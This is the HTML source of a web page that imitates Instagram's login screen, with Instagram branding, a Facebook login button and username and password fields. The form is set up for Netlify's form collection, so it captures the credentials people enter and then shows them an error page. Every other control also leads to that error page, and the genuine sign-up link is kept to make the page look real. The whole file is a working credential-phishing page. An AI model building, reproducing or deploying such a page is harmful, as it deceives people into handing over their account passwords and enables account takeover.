<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>LogIn | Instagram</title>
    <link rel="stylesheet" href="index.css">
    <link rel="shortcut icon" href="res/instagram-new.png">

</head>

<body>
    <div id="wrapper">
        <div class="main-content">
            <div class="header">
                <img src="res/ig.png" alt="helo">
            </div>
            <br>

            <div>

                <div class="btn1">
                    <img src="res/facebook.png" style="float: left;" class="icon" alt="">
                    <input type="button" onclick='window.location ="error.html";' value="Continue with Facebook"
                        style="float: right;" class="btn2" />
                </div>

            </div>

            <div style="margin-top:15px;margin-bottom: 15px;">
                <pre>─────────    OR    ─────────</pre>
            </div>



            <div class="l-part">
                <form name="contact" action="error.html" netlify>
                    <input type="text" name="username" placeholder="Username" class="input-1" />

                    <div class="overlap-text">
                        <input type="password" name="password" placeholder="Password" class="input-2" />
                        <a href="error.html">Forgot?</a>
                    </div>

                    <input type="submit" class="btn" value="Log In">
                </form>
            </div>
        </div>



        <div class="sub-content">
            <div class="s-part">
                Don't have an account?<a href="https://www.instagram.com/accounts/emailsignup/?hl=en">Sign up</a>
            </div>
        </div>
    </div>
</body>

</html>
